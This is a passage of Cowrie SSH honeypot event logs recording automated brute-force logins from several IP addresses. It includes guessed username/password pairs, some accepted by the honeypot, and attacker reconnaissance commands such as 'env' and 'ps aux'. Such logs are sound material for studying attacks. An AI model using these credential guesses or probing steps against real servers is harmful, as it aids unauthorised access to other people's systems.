.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:54:23.678623Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.login.success","username":"root","password":"Andre","message":"login attempt [root/Andre] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:54:29.007065Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38600,"dst_ip":"1.2.3.4","dst_port":22,"session":"01581f1c989b","protocol":"ssh","message":"New connection: 212.227.125.160:38600 (1.2.3.4:22) [session: 01581f1c989b]","sensor":"my-vps","timestamp":"2025-08-31T06:54:30.898463Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46602,"dst_ip":"1.2.3.4","dst_port":22,"session":"01961022a913","protocol":"ssh","message":"New connection: 212.227.235.229:46602 (1.2.3.4:22) [session: 01961022a913]","sensor":"my-vps","timestamp":"2025-08-31T06:54:31.683995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:54:31.703591Z","src_ip":"212.227.125.160","session":"01581f1c989b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:54:31.705037Z","src_ip":"212.227.125.160","session":"01581f1c989b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:54:31.736824Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T06:54:31.737525Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:34.169918Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:34.171248Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.login.failed","username":"user","password":"root123","message":"login attempt [user/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:54:34.301509Z","src_ip":"212.227.125.160","session":"01581f1c989b"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-31T06:54:35.236027Z","src_ip":"212.227.125.160","session":"d71d9640d244"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:35.800658Z","src_ip":"212.227.125.160","session":"01581f1c989b"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":56216,"dst_ip":"1.2.3.4","dst_port":22,"session":"316f25c7db4d","protocol":"ssh","message":"New connection: 201.148.180.50:56216 (1.2.3.4:22) [session: 316f25c7db4d]","sensor":"my-vps","timestamp":"2025-08-31T06:54:40.684541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:54:42.078646Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:54:42.079411Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.257639Z","src_ip":"212.227.235.229","session":"8147634deb82"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.258643Z","src_ip":"212.227.235.229","session":"98fc652a7a6a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.259489Z","src_ip":"212.227.235.229","session":"178c111fa98c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.260495Z","src_ip":"212.227.235.229","session":"aba98032cd05"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.261370Z","src_ip":"212.227.235.229","session":"2a741685b64c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.262874Z","src_ip":"212.227.235.229","session":"50d943852867"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.263551Z","src_ip":"212.227.235.229","session":"89333713a5d3"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:44.264418Z","src_ip":"212.227.235.229","session":"c270f03471bf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:54:45.211537Z","src_ip":"212.227.235.229","session":"01961022a913"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:54:45.212273Z","src_ip":"212.227.235.229","session":"01961022a913"}
{"eventid":"cowrie.login.success","username":"root","password":"Andre","message":"login attempt [root/Andre] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:54:45.404977Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.session.closed","duration":"61.8","message":"Connection lost after 61.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:46.826017Z","src_ip":"212.227.125.160","session":"d71d9640d244"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:54:48.178407Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T06:54:48.179187Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:49.999969Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:50.001178Z","src_ip":"201.148.180.50","session":"316f25c7db4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:53.760556Z","src_ip":"212.227.125.160","session":"f7700d0eece2"}
{"eventid":"cowrie.session.closed","duration":180.11682176589966,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:53.765595Z","src_ip":"212.227.125.160","session":"f7700d0eece2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55154,"dst_ip":"1.2.3.4","dst_port":22,"session":"46a374d26e10","protocol":"ssh","message":"New connection: 212.227.235.229:55154 (1.2.3.4:22) [session: 46a374d26e10]","sensor":"my-vps","timestamp":"2025-08-31T06:55:09.067517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:55:09.861814Z","src_ip":"212.227.235.229","session":"46a374d26e10"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:55:09.862769Z","src_ip":"212.227.235.229","session":"46a374d26e10"}
{"eventid":"cowrie.login.failed","username":"user","password":"P@ssw0rd123","message":"login attempt [user/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:55:15.460331Z","src_ip":"212.227.235.229","session":"46a374d26e10"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:55:17.209519Z","src_ip":"212.227.235.229","session":"46a374d26e10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50864,"dst_ip":"1.2.3.4","dst_port":22,"session":"33ee8443a979","protocol":"ssh","message":"New connection: 212.227.125.160:50864 (1.2.3.4:22) [session: 33ee8443a979]","sensor":"my-vps","timestamp":"2025-08-31T06:55:23.118705Z"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-31T06:55:25.475637Z","src_ip":"212.227.235.229","session":"01961022a913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44826,"dst_ip":"1.2.3.4","dst_port":22,"session":"7896316b2c60","protocol":"ssh","message":"New connection: 212.227.125.160:44826 (1.2.3.4:22) [session: 7896316b2c60]","sensor":"my-vps","timestamp":"2025-08-31T06:55:30.385185Z"}
{"eventid":"cowrie.session.connect","src_ip":"104.234.115.76","src_port":21708,"dst_ip":"1.2.3.4","dst_port":22,"session":"484a63d5ba7d","protocol":"ssh","message":"New connection: 104.234.115.76:21708 (1.2.3.4:22) [session: 484a63d5ba7d]","sensor":"my-vps","timestamp":"2025-08-31T06:55:30.420093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-31T06:55:30.522514Z","src_ip":"104.234.115.76","session":"484a63d5ba7d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T06:55:30.621375Z","src_ip":"104.234.115.76","session":"484a63d5ba7d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T06:55:30.724014Z","src_ip":"104.234.115.76","session":"484a63d5ba7d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:55:30.725515Z","src_ip":"104.234.115.76","session":"484a63d5ba7d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:55:31.008147Z","src_ip":"212.227.125.160","session":"7896316b2c60"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:55:31.009162Z","src_ip":"212.227.125.160","session":"7896316b2c60"}
{"eventid":"cowrie.login.failed","username":"user","password":"P@ssw0rd123","message":"login attempt [user/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:55:32.930341Z","src_ip":"212.227.125.160","session":"7896316b2c60"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:55:34.339936Z","src_ip":"212.227.125.160","session":"7896316b2c60"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:55:36.887172Z","src_ip":"212.227.125.160","session":"33ee8443a979"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:55:36.888914Z","src_ip":"212.227.125.160","session":"33ee8443a979"}
{"eventid":"cowrie.session.closed","duration":"67.3","message":"Connection lost after 67.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:55:38.983148Z","src_ip":"212.227.235.229","session":"01961022a913"}
{"eventid":"cowrie.session.connect","src_ip":"104.234.115.76","src_port":47532,"dst_ip":"1.2.3.4","dst_port":22,"session":"a53305857795","protocol":"ssh","message":"New connection: 104.234.115.76:47532 (1.2.3.4:22) [session: a53305857795]","sensor":"my-vps","timestamp":"2025-08-31T06:55:39.283006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:55:39.578506Z","src_ip":"104.234.115.76","session":"a53305857795"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp